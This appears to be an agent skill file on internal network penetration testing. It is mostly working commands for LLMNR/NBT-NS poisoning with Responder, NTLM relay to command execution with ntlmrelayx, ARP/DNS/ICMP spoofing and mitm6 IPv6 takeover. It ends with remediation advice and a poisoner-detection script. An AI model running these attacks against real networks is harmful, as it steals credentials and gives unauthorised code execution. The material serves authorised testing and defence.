---
name: performing-internal-network-pentesting
description: Methodology for internal network penetration testing from a foothold on the LAN, covering host discovery, port scanning, passive/active sniffing, MitM (ARP/DNS/ICMP/DHCPv6), and LLMNR/NBT-NS/mDNS poisoning with Responder plus relay attacks during authorized engagements.
domain: cybersecurity
subdomain: penetration-testing
tags:
  - penetration-testing
  - network-pentesting
  - host-discovery
  - llmnr-poisoning
  - mitm
  - ntlm-relay
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Performing Internal Network Pentesting

## When to Use

- When you have a foothold (drop box, VM, or compromised host) on an internal LAN
- At the start of an internal engagement to discover live hosts, open ports, and services
- When capturing credentials passively via broadcast/multicast name resolution poisoning
- When performing man-in-the-middle to intercept traffic on a switched segment
- When relaying captured NTLM authentication to reachable hosts for lateral movement

## Critical: Techniques Most Often Missed

The highest-value internal technique is poisoning LLMNR/NBT-NS/mDNS — Windows hosts fall back to these unauthenticated broadcast protocols when DNS fails, leaking NetNTLM hashes. Many testers also forget to scan broadcast addresses and to check which hosts lack SMB signing before relaying.

```bash
# 1. Poison LLMNR / NBT-NS / mDNS to capture NetNTLMv1/v2 hashes (#1 internal win)
responder -I eth0 -wv        # add -A first to analyze only (no poisoning); drop it to actively poison
# captured hashes land in /usr/share/responder/logs/ -> crack with hashcat -m 5600

# 2. Relay instead of crack: find hosts WITHOUT SMB signing, then relay auth to them
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt   # signing:False hosts
# turn OFF Responder's SMB/HTTP servers (Responder.conf: SMB=Off, HTTP=Off) first
ntlmrelayx.py -tf targets.txt -smb2support -i                 # relay -> SOCKS / command exec

# 3. Discover hosts on the broadcast domain you'd otherwise miss
ping -b 10.10.5.255          # subnet broadcast reaches every local host
nmap -sn <network>           # ARP sweep (same L2 = reliable host discovery)
nbtscan -r 192.168.0.1/24    # NetBIOS names

# 4. IPv6 is usually unmonitored — mitm6 + relay is devastating in AD
mitm6 -d domain.local        # rogue DHCPv6/DNS; pair with ntlmrelayx -6
```

How to CONFIRM: Responder logs a hash only when a victim actually queries a name it can't resolve — trigger it (or wait) and check the `responder -I eth0` console plus `logs/`. For relay, a successful run prints `[*] Authenticating against smb://<target> SUCCEED` and (with `-i`) opens a SOCKS-able session. Validate captured NetNTLMv2 with `hashcat -m 5600`.

## Workflow

### Step 1: Host Discovery (you are on the same L2)

```bash
# Passive (quiet)
netdiscover -p                  # passive ARP listening; sends no packets
p0f -i eth0 -o /tmp/p0f.log     # passive OS fingerprinting of observed hosts

# Active
nmap -sn <network>              # ARP requests on local subnet
netdiscover -r <network>
nbtscan -r 192.168.0.1/24
ping -b 10.10.5.255             # subnet broadcast
alive6 eth0                     # IPv6 multicast ping

# Bettercap recon
# net.probe on ; net.show
```

### Step 2: Port and Service Scanning

```bash
masscan -p20,21-23,25,53,80,110,135,139,143,443,445,993,3306,3389,5900,8080 <network>/24
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>          # top 1000 TCP
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullscan <IP>      # all TCP
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>     # top UDP
```

### Step 3: Passive and Active Sniffing

```bash
# Passive capture (rotate files; filter sensitive protocols)
sudo tcpdump -i eth0 -G 300 -w '/tmp/dump-%H%M%S.pcap' -W 50 'tcp and (port 80 or port 443)'
sudo tcpdump -i eth0 udp port 53    # see what hosts resolve

# Remote capture into local Wireshark
ssh user@<TARGET> tcpdump -i ens160 -U -s0 -w - 'port not 22' | sudo wireshark -k -i -

# Parse creds out of pcap or live
PCredz -f capture.pcap              # or -i eth0
```

### Step 4: Man-in-the-Middle

```bash
# ARP spoofing (enable forwarding first, or you black-hole the victim)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.2 192.168.1.1 &
arpspoof -t 192.168.1.1 192.168.1.2 &
# Bettercap: arp.spoof on ; set arp.spoof.targets <IP> ; set arp.spoof.fullduplex true

# DNS spoofing
# bettercap: set dns.spoof.hosts ./dns.spoof.hosts ; dns.spoof on

# ICMP redirect
hping3 <VICTIM> -C 5 -K 1 -a <VICTIM_GW> --icmp-gw <ATTACKER> --icmp-ipdst <DST> --icmp-ipsrc <VICTIM>

# IPv6 (mitm6 / DHCPv6 + rogue DNS — high impact in AD)
mitm6 -d domain.local
```

### Step 5: LLMNR/NBT-NS/mDNS Poisoning + Relay

```bash
# Capture mode (crack offline)
responder -I eth0 -wv
hashcat -m 5600 hashes.txt rockyou.txt      # NetNTLMv2

# Relay mode (no cracking needed): disable Responder SMB/HTTP, target unsigned hosts
crackmapexec smb <network>/24 --gen-relay-list targets.txt
ntlmrelayx.py -tf targets.txt -smb2support -i            # interactive SOCKS
ntlmrelayx.py -tf targets.txt -smb2support -c 'whoami'   # command execution

# Combine with IPv6 for WPAD/DNS takeover:
mitm6 -d domain.local &
ntlmrelayx.py -6 -wh attacker-wpad -tf targets.txt -smb2support
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **ARP discovery** | On the same L2, ARP requests reliably enumerate live hosts where ICMP is filtered |
| **LLMNR / NBT-NS / mDNS** | Unauthenticated broadcast/multicast name resolution that Windows/Apple/Linux fall back to; poisonable |
| **NetNTLMv1/v2** | Challenge-response auth captured via poisoning; crack offline or relay (cannot pass-the-hash) |
| **SMB signing** | If a target does NOT enforce signing, captured auth can be relayed to it for code exec |
| **Relay vs crack** | Relaying forwards the live auth to another host; avoids needing the plaintext password |
| **WPAD** | Proxy auto-discovery; Responder serves a rogue wpad.dat to harvest browser/credential auth |
| **mitm6** | Abuses default Windows IPv6 preference to become DHCPv6/DNS and drive relay/WPAD attacks |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap / masscan** | Host discovery and TCP/UDP service scanning |
| **netdiscover / nbtscan / arp-scan** | L2 host and NetBIOS name discovery |
| **Responder** | Poison LLMNR/NBT-NS/mDNS, rogue WPAD/DNS/DHCP, capture NetNTLM |
| **Impacket ntlmrelayx.py** | Relay captured NTLM auth to SMB/LDAP/HTTP targets (SOCKS, exec) |
| **CrackMapExec / NetExec** | Build relay target lists, validate creds, sweep SMB |
| **bettercap / arpspoof / ettercap** | ARP/DNS/ICMP MitM and sniffing |
| **mitm6** | IPv6 DHCPv6/DNS takeover to amplify relay attacks |
| **tcpdump / Wireshark / PCredz** | Capture and extract credentials from traffic |

## Common Scenarios

### Scenario 1: LLMNR Poisoning to Hash

A misconfigured workstation queries a mistyped share name. Responder answers, the host authenticates, and a NetNTLMv2 hash is captured and cracked offline to a domain user password.

### Scenario 2: NTLM Relay to Unsigned Host

SMB signing is not enforced on several servers. With Responder's SMB/HTTP off, ntlmrelayx relays poisoned authentication to a `signing:False` host, executing commands as the relayed account.

### Scenario 3: mitm6 + WPAD in AD

The network is dual-stack but IPv6 is unmanaged. `mitm6` becomes the DHCPv6/DNS server, serves a rogue WPAD, and feeds authentications into ntlmrelayx against LDAP to add a machine or escalate.

### Scenario 4: ARP MitM Credential Sniffing

On a flat switched segment, ARP spoofing places the tester between a client and an app server; PCredz extracts cleartext and NTLM credentials from the intercepted stream.

## Output Format

```
## Internal Network Pentest Finding

**Vulnerability**: LLMNR/NBT-NS poisoning + NTLM relay (no SMB signing)
**Severity**: High (CVSS 8.1)
**Location**: Internal VLAN 10.10.20.0/24

### Reproduction Steps
1. responder -I eth0 -wv -> captured NetNTLMv2 for CORP\jsmith
2. crackmapexec smb 10.10.20.0/24 --gen-relay-list targets.txt (signing disabled hosts)
3. Disable Responder SMB/HTTP; ntlmrelayx.py -tf targets.txt -smb2support -c 'whoami'
4. Relayed jsmith auth to 10.10.20.40 -> executed as CORP\jsmith (local admin)

### Captured / Reached
| Item | Detail |
|------|--------|
| NetNTLMv2 | CORP\jsmith (cracked: Summer2024!) |
| Relay target | 10.10.20.40 (SMB signing not required) |
| Access | Local admin command execution |

### Recommendation
1. Disable LLMNR (GPO) and NBT-NS; remove mDNS where unused
2. Enforce SMB signing (server and client) to block relay
3. Disable IPv6 if unused, or manage DHCPv6/RA to prevent mitm6
4. Enforce strong passwords/MFA; segment and monitor for ARP anomalies and rogue responders
```
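The Key Concepts table and Recommendation item 4 ("monitor for ... rogue responders") describe the property a defender can detect: a legitimate host only answers LLMNR/NBT-NS queries for its own name, while a poisoner answers every name it hears. The script below is an added detection-side example, not part of the original skill; the record format and the sample records are constructed for this example (assumed export from a name-resolution sensor), and `find_poisoners` / `honeytoken_hits` are names chosen here.

```python
# Added example: flag LLMNR/NBT-NS poisoning from name-resolution response
# records. Field layout and the sample records below are constructed for this
# example (assumed sensor export format, not from Responder or the skill page).
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # (timestamp, protocol, queried name, IP that answered the query)
    ("2024-06-03T09:00:01", "LLMNR",  "fileserver01",   "10.10.20.15"),
    ("2024-06-03T09:00:07", "NBT-NS", "FILESRV01",      "10.10.20.15"),
    ("2024-06-03T09:00:12", "LLMNR",  "printsvr",       "10.10.20.15"),
    ("2024-06-03T09:00:25", "LLMNR",  "wpad",           "10.10.20.15"),
    ("2024-06-03T09:00:30", "LLMNR",  "zz-canary-host", "10.10.20.15"),
    ("2024-06-03T09:01:40", "LLMNR",  "printsvr",       "10.10.20.8"),  # real owner
    ("2024-06-03T09:02:03", "LLMNR",  "fileserver01",   "10.10.20.15"),
]

def parse_event(raw):
    ts, proto, name, src = raw
    return {"ts": datetime.fromisoformat(ts), "proto": proto,
            "name": name.lower(), "src": src}

def find_poisoners(events, window=timedelta(minutes=5), min_names=3):
    """Return {src_ip: [names]} for sources that answered queries for at least
    `min_names` distinct names inside any `window`. A legitimate host answers
    only for its own name(s); a poisoner answers everything, including
    mistyped names and the protected name 'wpad'."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_src[ev["src"]].append(ev)
    flagged = {}
    for src, evs in by_src.items():
        for i, start in enumerate(evs):
            names = {e["name"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(names) >= min_names:
                flagged[src] = sorted(names)
                break
    return flagged

def honeytoken_hits(events, canary_name):
    """Periodically query a name that exists nowhere on the network (the
    canary); any IP answering it is poisoning. Returns the offending IPs."""
    return sorted({e["src"] for e in events if e["name"] == canary_name.lower()})

if __name__ == "__main__":
    evs = [parse_event(r) for r in SAMPLE_EVENTS]
    for ip, names in find_poisoners(evs).items():
        print(f"suspect poisoner {ip}: answered {len(names)} distinct names {names}")
    print("canary answered by:", honeytoken_hits(evs, "ZZ-CANARY-HOST"))
```

On the sample records only 10.10.20.15 is flagged (five distinct names in under five minutes, plus the canary), while 10.10.20.8, which answered solely for its own name, is not.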